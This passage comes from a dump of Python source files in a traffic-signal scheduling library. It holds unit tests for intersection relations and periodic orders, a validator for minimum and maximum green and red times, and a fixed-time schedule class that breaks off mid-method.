GIVEN\n input_dict = TestSyncStartInputValidation.get_default_inputs()\n\n # WHEN\n sync_start = SyncStart(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n sync_start_dict = sync_start.to_json()\n sync_start_from_json = SyncStart.from_json(sync_start_dict=sync_start_dict)\n self.assertDictEqual(sync_start_dict, sync_start_from_json.to_json())\n\n\nclass TestCoordinationInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for Coordination() \"\"\"\n return dict(from_id=\"1\", to_id=\"2\", seconds=10)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing Coordination object with correct input \"\"\"\n # GIVEN\n input_dict = TestCoordinationInputValidation.get_default_inputs()\n\n # WHEN\n Offset(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to Coordionation for ids \"\"\"\n # GIVEN\n input_dict = TestCoordinationInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = 1\n input_dict[\"to_id\"] = 2\n\n # WHEN initializing the offset\n offset = Offset(**input_dict)\n\n # Should not give an error (datatype is converted to string)\n self.assertEqual(offset.from_id, \"1\")\n self.assertEqual(offset.to_id, \"2\")\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a Coordination \"\"\"\n # GIVEN\n input_dict = TestCoordinationInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = \"1\"\n input_dict[\"to_id\"] = \"1\"\n with self.assertRaises(ValueError):\n Offset(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestCoordinationJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestCoordinationInputValidation.get_default_inputs()\n\n # WHEN\n offset = Offset(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n offset_dict = offset.to_json()\n offset_from_json = Offset.from_json(offset_dict=offset_dict)\n self.assertDictEqual(offset_dict, offset_from_json.to_json())\n\n\nclass TestGreenyellowLeadInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for GreenyellowLead() \"\"\"\n return dict(from_id=\"1\", to_id=\"2\", min_seconds=10, max_seconds=15)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenyellowLead object with correct input \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n\n # WHEN\n GreenyellowLead(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to GreenyellowLead for ids \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = 1\n input_dict[\"to_id\"] = 2\n\n # WHEN initializing the greenyellow-lead\n greenyellow_lead = GreenyellowLead(**input_dict)\n\n # Should not give an error (datatype is converted to string)\n self.assertEqual(greenyellow_lead.from_id, \"1\")\n self.assertEqual(greenyellow_lead.to_id, \"2\")\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a GreenyellowLead \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = \"1\"\n input_dict[\"to_id\"] = \"1\"\n with self.assertRaises(ValueError):\n GreenyellowLead(**input_dict)\n\n # THEN an error should be raised\n\n def test_minimum_exceeding_maximum(self) -> None:\n \"\"\" Test giving two identical ids to initialize a GreenyellowLead \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n input_dict[\"min_seconds\"] = 20\n input_dict[\"max_seconds\"] = 10\n with self.assertRaises(ValueError):\n GreenyellowLead(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestGreenyellowLeadJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n\n # WHEN\n greenyellow_lead = GreenyellowLead(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n greenyellow_lead_dict = greenyellow_lead.to_json()\n greenyellow_lead_from_json = GreenyellowLead.from_json(json_dict=greenyellow_lead_dict)\n self.assertDictEqual(greenyellow_lead_dict, greenyellow_lead_from_json.to_json())\n\n\nclass TestGreenyellowTrailInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for GreenyellowTrail() \"\"\"\n return dict(from_id=\"1\", to_id=\"2\", min_seconds=11, max_seconds=14)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenyellowTrail object with correct input \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n\n # WHEN\n GreenyellowTrail(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to GreenyellowTrail for ids \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = 1\n input_dict[\"to_id\"] = 2\n\n # WHEN initializing the greenyellow-lead\n greenyellow_trail = GreenyellowTrail(**input_dict)\n\n # Should not give an error (datatype is converted to string)\n self.assertEqual(greenyellow_trail.from_id, \"1\")\n self.assertEqual(greenyellow_trail.to_id, \"2\")\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a GreenyellowTrail \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = \"1\"\n input_dict[\"to_id\"] = \"1\"\n with self.assertRaises(ValueError):\n GreenyellowTrail(**input_dict)\n\n # THEN an error should be raised\n\n def test_minimum_exceeding_maximum(self) -> None:\n \"\"\" Test giving two identical ids to initialize a Coordination \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n input_dict[\"min_seconds\"] = 20\n input_dict[\"max_seconds\"] = 10\n with self.assertRaises(ValueError):\n GreenyellowTrail(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestGreenyellowTrailJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n\n # WHEN\n greenyellow_trail = GreenyellowTrail(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n greenyellow_trail_dict = greenyellow_trail.to_json()\n greenyellow_trail_from_json = GreenyellowTrail.from_json(json_dict=greenyellow_trail_dict)\n self.assertDictEqual(greenyellow_trail_dict, greenyellow_trail_from_json.to_json())\n"
},
{
"alpha_fraction": 0.6746776103973389,
"alphanum_fraction": 0.6770222783088684,
"avg_line_length": 36.10869598388672,
"blob_id": "d69374eebcd4eb1d04be7257b13c331123e0d7cd",
"content_id": "b3e9437d298aa113ff9866f0d4d7f39be09748cf",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1706,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 46,
"path": "/swift_cloud_py/entities/intersection/test/test_periodic_order.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\n\n\nclass TestPeriodicOrderInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for PeriodicOrder() \"\"\"\n return {\"order\": [\"sg1\", \"sg2\", \"sg3\"]}\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing PeriodicOrder object with correct input \"\"\"\n # GIVEN\n input_dict = TestPeriodicOrderInputValidation.get_default_inputs()\n\n # WHEN\n PeriodicOrder(**input_dict)\n\n # THEN no exception should occur\n\n def test_duplicate_ids(self) -> None:\n \"\"\" Test that an error is raised when the same id is used multiple times \"\"\"\n # GIVEN\n input_dict = TestPeriodicOrderInputValidation.get_default_inputs()\n input_dict[\"order\"].append(\"sg1\")\n # WHEN initializing the periodic order\n with self.assertRaises(ValueError):\n PeriodicOrder(**input_dict)\n\n\nclass TestPeriodicOrderJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestPeriodicOrderInputValidation.get_default_inputs()\n\n # WHEN\n periodic_order = PeriodicOrder(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n periodic_order_dict = periodic_order.to_json()\n periodic_order_from_json = PeriodicOrder.from_json(order_dict=periodic_order_dict)\n self.assertDictEqual(periodic_order_dict, periodic_order_from_json.to_json())"
},
{
"alpha_fraction": 0.5966955423355103,
"alphanum_fraction": 0.6202846765518188,
"avg_line_length": 54.50828552246094,
"blob_id": "6d9bfa2042357824d47942cd9157fe8621056f38",
"content_id": "1cd4f8381583f3ec8140e44f71f0058914d3a585",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10047,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 181,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_violation_of_bounds.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom copy import deepcopy\nfrom typing import Optional, List\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule, GreenYellowInterval\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\nfrom swift_cloud_py.validate_safety_restrictions.validate_bounds import validate_bounds\n\n\nclass TestFTSValidationOfBounds(unittest.TestCase):\n \"\"\" Test whether a minimum or a maximum greenyellow time (or red time) is violated \"\"\"\n\n @staticmethod\n def get_default_signalgroup(name: str, min_greenyellow: float = 10.0, max_greenyellow: float = 80.0,\n min_red: float = 10.0, max_red: float = 80.0) -> SignalGroup:\n \"\"\" Get a default signalgroup object\"\"\"\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n return SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=min_greenyellow, max_greenyellow=max_greenyellow, min_red=min_red,\n max_red=max_red, min_nr=1, max_nr=3)\n\n @staticmethod\n def get_default_intersection(additional_signalgroups: Optional[List[SignalGroup]] = None,\n additional_conflicts: Optional[List[Conflict]] = None,\n ) -> Intersection:\n \"\"\"\n Get a default intersection object with 2 conflicting signal groups \"sg1\" and \"sg2\"\n :param additional_signalgroups: signal groups to add to the intersection (besides signal group 'sg1' and 'sg2')\n :param additional_conflicts: additional conflicts to add\n (besides the conflict between signal group 'sg1' and 'sg2')\n :return: the intersection object\n \"\"\"\n if additional_signalgroups is None:\n additional_signalgroups = []\n if additional_conflicts is None:\n additional_conflicts = []\n\n signalgroup1 = TestFTSValidationOfBounds.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestFTSValidationOfBounds.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2] + additional_signalgroups,\n conflicts=[conflict] + additional_conflicts)\n\n return intersection\n\n @staticmethod\n def get_arrival_rates(signalgroups: List[SignalGroup]):\n id_to_arrival_rates = {signalgroup.id: 100 for signalgroup in signalgroups}\n return ArrivalRates(id_to_arrival_rates=id_to_arrival_rates)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test validating correct fts; we will modify this schedule to violate minimum green and red times \"\"\"\n # GIVEN\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=45),\n GreenYellowInterval(start_greenyellow=75, end_greenyellow=95)]), period=100)\n intersection = TestFTSValidationOfBounds.get_default_intersection()\n\n # WHEN\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_green_interval_too_small(self) -> None:\n \"\"\" Test green interval too short \"\"\"\n # GIVEN\n fts_org = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=45),\n GreenYellowInterval(start_greenyellow=75, end_greenyellow=95)]), period=100)\n\n intersection = TestFTSValidationOfBounds.get_default_intersection()\n\n for signal_group_id, index in [(\"sg1\", 0), (\"sg1\", 1), (\"sg2\", 0), (\"sg2\", 1)]:\n with self.subTest(f\"green interval {index} to small for sg={signal_group_id}\"):\n with self.assertRaises(SafetyViolation):\n fts = deepcopy(fts_org)\n\n # change the greenyellow interval to have a duration of only 5 seconds\n fts._greenyellow_intervals[signal_group_id][index].end_greenyellow = \\\n (fts._greenyellow_intervals[signal_group_id][index].start_greenyellow + 5) % fts.period\n # WHEN validating\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n\n def test_red_interval_too_small(self) -> None:\n \"\"\" Test red interval too short \"\"\"\n # GIVEN\n fts_org = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=45),\n GreenYellowInterval(start_greenyellow=75, end_greenyellow=95)]), period=100)\n\n intersection = TestFTSValidationOfBounds.get_default_intersection()\n\n for signal_group_id, index in [(\"sg1\", 0), (\"sg1\", 1), (\"sg2\", 0), (\"sg2\", 1)]:\n with self.subTest(f\"red interval {index} to small for sg={signal_group_id}\"):\n with self.assertRaises(SafetyViolation):\n fts = deepcopy(fts_org)\n prev_index = (index - 1) % 2\n\n # red time of only 5 seconds\n fts._greenyellow_intervals[signal_group_id][index].start_greenyellow = \\\n (fts._greenyellow_intervals[signal_group_id][prev_index].end_greenyellow + 5) % 100\n # WHEN validating\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n\n def test_successful_validation2(self) -> None:\n \"\"\" Test validation for correct fts; we will modify this schedule to violate maximum green and red times \"\"\"\n # GIVEN\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)],\n sg2=[GreenYellowInterval(start_greenyellow=60, end_greenyellow=110),\n GreenYellowInterval(start_greenyellow=180, end_greenyellow=230)]),\n period=240)\n\n intersection = TestFTSValidationOfBounds.get_default_intersection()\n\n # WHEN\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_green_interval_too_large(self) -> None:\n \"\"\" Test green interval too large \"\"\"\n # GIVEN\n # green interval of signalgroup 3 is too large\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)],\n sg2=[GreenYellowInterval(start_greenyellow=60, end_greenyellow=110),\n GreenYellowInterval(start_greenyellow=180, end_greenyellow=230)],\n sg3=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=80),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)]),\n period=240)\n\n signalgroup3 = TestFTSValidationOfBounds.get_default_signalgroup(name=\"sg3\", max_greenyellow=40)\n intersection = TestFTSValidationOfBounds.get_default_intersection(additional_signalgroups=[signalgroup3])\n\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n\n def test_red_interval_too_large(self) -> None:\n \"\"\" Test red interval too large \"\"\"\n # GIVEN\n # red interval of signalgroup 3 is too large\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)],\n sg2=[GreenYellowInterval(start_greenyellow=60, end_greenyellow=110),\n GreenYellowInterval(start_greenyellow=180, end_greenyellow=230)],\n sg3=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)]),\n period=240)\n\n signalgroup3 = TestFTSValidationOfBounds.get_default_signalgroup(name=\"sg3\", max_red=60)\n intersection = TestFTSValidationOfBounds.get_default_intersection(additional_signalgroups=[signalgroup3])\n\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n"
},
{
"alpha_fraction": 0.6602720618247986,
"alphanum_fraction": 0.667248010635376,
"avg_line_length": 58.72916793823242,
"blob_id": "a3dd17ddb6e4ad650f526a18ddf9e209269825d6",
"content_id": "d1a5ff7ff238754e1afb9dce82468c907ef7a084",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2867,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 48,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_bounds.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\n\n\ndef validate_bounds(intersection: Intersection, fts: FixedTimeSchedule, tolerance: float = 10**(-2)):\n \"\"\"\n Ensure that all bounds on greenyellow and red times are satiesfied for the specified fixed-time schedule.\n :param intersection: intersection object (this object also contains safety restrictions that a\n fixed-time schedule should satisfy)\n :param fts: FixedTimeSchedule object for which we want to check the safety restrictions\n :param tolerance: tolerance in seconds for violating safety restrictions\n :raises SafetyViolation if validations fail\n \"\"\"\n # check the duration of greenyellow times and red times\n for signalgroup in intersection.signalgroups:\n greenyellow_intervals = fts.get_greenyellow_intervals(signalgroup=signalgroup)\n # end of the last greenyellow interval\n prev_red_switch = greenyellow_intervals[-1].end_greenyellow\n\n # loop over the greenyellow intervals\n for _, interval in enumerate(greenyellow_intervals):\n # the duration of the red interval preceeding this greenyellow interval\n red_time = (interval.start_greenyellow - prev_red_switch + tolerance) % fts.period - tolerance\n\n # the duration of the greenyellow interval\n greenyellow_time = (interval.end_greenyellow - interval.start_greenyellow + tolerance) % fts.period - \\\n tolerance\n\n # check these durations for violations of the minimum and maximum durations\n if red_time < signalgroup.min_red - tolerance:\n raise SafetyViolation(\n f\"Red time of sg '{signalgroup.id}' too short ({red_time:3.1f} seconds while \"\n f\"min={signalgroup.min_red:3.1f})\")\n\n if red_time > signalgroup.max_red + tolerance:\n raise SafetyViolation(\n f\"Red time of sg '{signalgroup.id}' too long ({red_time:3.1f} seconds \"\n f\"while max={signalgroup.max_red:3.1f})\")\n if greenyellow_time < signalgroup.min_greenyellow - tolerance:\n raise SafetyViolation(\n f\"Greenyellow time of sg '{signalgroup.id}' too short ({greenyellow_time:3.1f} seconds while \"\n f\"min={signalgroup.min_greenyellow:3.1f})\")\n if greenyellow_time > signalgroup.max_greenyellow + tolerance:\n raise SafetyViolation(\n f\"Greenyellow time of sg '{signalgroup.id}' too large ({greenyellow_time:3.1f} seconds while \"\n f\"max={signalgroup.max_greenyellow:3.1f})\")\n prev_red_switch = interval.end_greenyellow\n"
},
{
"alpha_fraction": 0.6416081190109253,
"alphanum_fraction": 0.6455303430557251,
"avg_line_length": 46.992156982421875,
"blob_id": "98a93ef306fbf7c7f7807cc036f5dfb623ad1882",
"content_id": "65f24967a6185a595bd583dfc21e897b7e50bddc",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12238,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 255,
"path": "/swift_cloud_py/entities/control_output/fixed_time_schedule.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using a class as typing inside the same class\n\nfrom typing import Dict, List, Union\n\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\n\n\ndef sort_by_name(name: str):\n \"\"\" function needed to sort signal groups by name \"\"\"\n return len(name), name\n\n\nSIGNALGROUP_WRONG_TYPE_MSG = \"signalgroup should be a SignalGroup object or a string\"\nEPSILON = 10**(-3) # small value used in checks to allow a very small violation of constraints caused by numeric errors\n\n\nclass FixedTimeSchedule:\n \"\"\"\n Periodically repeating schedule specifying when signal groups have a greenyellow interval.\n \"\"\"\n def __init__(self, greenyellow_intervals: Dict[str, List[GreenYellowInterval]], period: float) -> None:\n self._greenyellow_intervals = greenyellow_intervals\n self.period = float(period)\n\n self._validate()\n\n def includes_signalgroup(self, signalgroup: Union[SignalGroup, str]) -> bool:\n \"\"\"\n Check if the specified signal group is included in the schedule.\n :param signalgroup: a SignalGroup object or a signalgroup id\n :return: Boolean indicating if the signal group is included in the schedule\n \"\"\"\n if isinstance(signalgroup, SignalGroup):\n _id = signalgroup.id\n elif isinstance(signalgroup, str):\n _id = signalgroup\n else:\n raise ValueError(SIGNALGROUP_WRONG_TYPE_MSG)\n\n if _id not in self._greenyellow_intervals:\n return False\n return True\n\n def get_greenyellow_intervals(self, signalgroup: Union[SignalGroup, str]) -> List[GreenYellowInterval]:\n \"\"\"\n get all green intervals of the specifies signal group\n :param signalgroup: a SignalGroup object or a signalgroup id\n :return:\n \"\"\"\n if isinstance(signalgroup, SignalGroup):\n _id = signalgroup.id\n elif isinstance(signalgroup, str):\n _id = signalgroup\n else:\n raise ValueError(SIGNALGROUP_WRONG_TYPE_MSG)\n\n if _id not in self._greenyellow_intervals:\n raise ValueError(\"Unknown signalgroup\")\n return self._greenyellow_intervals[_id]\n\n def get_greenyellow_interval(self, signalgroup: SignalGroup, k: int) -> GreenYellowInterval:\n \"\"\"\n get the green intervals k (index starts at 0!) of the specifies signal group\n :param signalgroup: a SignalGroup object or a signalgroup id\n :param k:\n :return:\n \"\"\"\n if isinstance(signalgroup, SignalGroup):\n _id = signalgroup.id\n elif isinstance(signalgroup, str):\n _id = signalgroup\n else:\n raise ValueError(SIGNALGROUP_WRONG_TYPE_MSG)\n\n if _id not in self._greenyellow_intervals:\n raise ValueError(\"Unkown signalgroup\")\n if k >= len(self._greenyellow_intervals[_id]):\n raise ValueError(f\"Trying to access greenyellow interval at index {k} for signalgroup {_id}, \"\n f\"but only indexes 0 until {len(self._greenyellow_intervals[signalgroup.id]) - 1} exist\")\n\n return self._greenyellow_intervals[_id][k]\n\n def _validate(self) -> None:\n \"\"\" Validate input arguments of FixedTimeSchedule; raises ValueError if validation does not pass\"\"\"\n self._validate_types()\n\n for _id, intervals in self._greenyellow_intervals.items():\n self._validate_correct_order(intervals=intervals)\n self._validate_not_overlapping(intervals=intervals)\n for interval in intervals:\n self._validate_interval_within_period(interval=interval)\n\n def _validate_types(self):\n \"\"\"validate the types of the input arguments\"\"\"\n # validate structure of greenyellow_intervals\n error_message = \"greenyellow_intervals should be a dictionary mapping from a signal group id (str) to \" \\\n \"a list of GreenYellowIntervals (List[float])\"\n if not isinstance(self._greenyellow_intervals, dict):\n raise ValueError(error_message)\n for _id, intervals in self._greenyellow_intervals.items():\n\n if not isinstance(_id, str):\n raise ValueError(error_message)\n if not isinstance(intervals, list):\n raise ValueError(error_message)\n for interval in intervals:\n if not isinstance(interval, GreenYellowInterval):\n raise ValueError(error_message)\n\n def _validate_interval_within_period(self, interval: GreenYellowInterval):\n \"\"\" validate a single greenyellow interval\"\"\"\n if interval.start_greenyellow > self.period + EPSILON:\n raise ValueError(\"start_greenyellow may not exceed period duration\")\n if interval.end_greenyellow > self.period + EPSILON:\n raise ValueError(\"end_greenyellow may not exceed period duration\")\n\n @staticmethod\n def _validate_correct_order(intervals: List[GreenYellowInterval]):\n \"\"\" Validate if the greenyellowintervals of one signal group are in correct order\"\"\"\n if len(intervals) == 0:\n return\n first_interval = min(intervals, key=lambda _interval: _interval.start_greenyellow)\n index_first_interval = intervals.index(first_interval)\n # ensure that the greenyellow interval that starts first is also first\n intervals_sorted = intervals[index_first_interval:] + intervals[:index_first_interval]\n\n # test correct order\n prev_start_greenyellow = intervals_sorted[0].start_greenyellow\n for interval in intervals_sorted[1:]:\n if interval.start_greenyellow <= prev_start_greenyellow:\n raise ValueError(\n \"The greenyellow intervals of a signal group must be provided in the correct (periodic)\"\n \"order, e.g., [[10, 40], [50, 80], [80, 100]] and not [[10, 40], [80, 100], [50, 80]]\")\n prev_start_greenyellow = interval.start_greenyellow\n\n def _validate_not_overlapping(self, intervals: List[GreenYellowInterval]):\n \"\"\" Validate if the greenyellowintervals of one signal group are not overlapping\"\"\"\n if len(intervals) == 0:\n return\n first_interval = min(intervals, key=lambda _interval: _interval.start_greenyellow)\n index_first_interval = intervals.index(first_interval)\n # ensure that the greenyellow interval that starts first is also first\n intervals_sorted = intervals[index_first_interval:] + intervals[:index_first_interval]\n\n # -EPSILON instead of zero in case the first switch is at 0 (but due numeric errors it is slightly below zero)\n prev_time = -EPSILON\n for k, interval in enumerate(intervals_sorted):\n if interval.start_greenyellow < prev_time:\n raise ValueError(\"The greenyellow intervals of a signal group must be non-overlapping\")\n prev_time = interval.start_greenyellow\n\n if (k < len(intervals_sorted) - 1 and interval.end_greenyellow < prev_time) or (\n k == len(intervals_sorted) - 1 and\n first_interval.start_greenyellow < interval.end_greenyellow < prev_time):\n raise ValueError(\"The greenyellow intervals of a signal group must be non-overlapping\")\n\n prev_time = interval.end_greenyellow\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"greenyellow_intervals\": {sg_id: [greenyellow_interval.to_json()\n for greenyellow_interval in greenyellow_intervals]\n for sg_id, greenyellow_intervals in self._greenyellow_intervals.items()},\n \"period\": self.period}\n\n @staticmethod\n def from_json(fts_dict: Dict) -> FixedTimeSchedule:\n \"\"\"Loading fixed-time schedule from json (expected same json structure as generated with to_json)\"\"\"\n return FixedTimeSchedule(greenyellow_intervals={sg_id: [GreenYellowInterval.from_json(\n greenyellow_interval_list=greenyellow_interval_list)\n for greenyellow_interval_list in greenyellow_interval_lists]\n for sg_id, greenyellow_interval_lists in fts_dict[\"greenyellow_intervals\"].items()},\n period=fts_dict[\"period\"])\n\n def __eq__(self, other: FixedTimeSchedule):\n if not isinstance(other, FixedTimeSchedule):\n raise ValueError(\"can only compare a FixedTimeSchedule to a FixedTimeSchedule\")\n\n # comparing the period duration\n if self.period != other.period:\n return False\n\n # comparing the ids\n ids = {_id for _id in self._greenyellow_intervals}\n other_ids = {_id for _id in other._greenyellow_intervals}\n if ids != other_ids:\n return False\n\n # comparing the greenyellow intervals\n for _id in ids:\n if self._greenyellow_intervals[_id] != other._greenyellow_intervals[_id]:\n return False\n\n return True\n\n def __str__(self) -> str:\n \"\"\"string representation of object\"\"\"\n string = \"fixed time schedule:\\n\"\n string += f\"\\tperiod: {self.period}\\n\"\n string += f\"\\tgreenyellow intervals:\"\n max_name = max(len(sg_id) for sg_id in self._greenyellow_intervals)\n\n # sort by name\n greenyellow_interval_tuples = sorted(self._greenyellow_intervals.items(),\n key=lambda item: sort_by_name(item[0]))\n for sg_id, greenyellow_intervals in greenyellow_interval_tuples:\n string += \"\\n\"\n # signal group name followed by semicolon, left aligned with width of max_name + 2\n string += f\"\\t\\t{sg_id + ':':<{max_name + 2}}\"\n for interval_index, interval in enumerate(greenyellow_intervals):\n if 0 < interval_index < len(greenyellow_intervals) - 1:\n string += \", \"\n elif 0 < interval_index == len(greenyellow_intervals) - 1:\n string += \" and \"\n string += f\"{str(interval)}\"\n return string\n\n\nclass GreenYellowInterval:\n \"\"\"\n A greenyellow interval; this is a general representation of the green interval itself and any other signal state\n (other than the pure red signal state) leading up to or following the green interval. For example,\n in the Netherlands the greenyellow interval would consist of the green interval followed by a yellow interval.\n In the UK, this greenyellow interval would consist of a yellow-red interval, followed by a green interval,\n succeeded by a yellow interval.\n \"\"\"\n\n def __init__(self, start_greenyellow: float, end_greenyellow: float) -> None:\n # by converting to the correct data type we ensure correct types are used\n self.start_greenyellow = float(start_greenyellow)\n self.end_greenyellow = float(end_greenyellow)\n assert start_greenyellow >= -EPSILON, \"start_greenyellow should be non-negative\"\n assert end_greenyellow >= -EPSILON, \"end_greenyellow should be non-negative\"\n\n def to_json(self) -> List:\n \"\"\"get json serializable structure that can be stored as json with json.dumps()\"\"\"\n return [self.start_greenyellow, self.end_greenyellow]\n\n @staticmethod\n def from_json(greenyellow_interval_list: List) -> GreenYellowInterval:\n \"\"\"Loading greenyellow interval from json (expected same json structure as generated with to_json)\"\"\"\n return GreenYellowInterval(*greenyellow_interval_list)\n\n def __eq__(self, greenyellow_interval: GreenYellowInterval):\n if not isinstance(greenyellow_interval, GreenYellowInterval):\n raise ValueError(\"can only compare a GreenYellowInterval to a GreenYellowInterval\")\n if greenyellow_interval.start_greenyellow == self.start_greenyellow and \\\n 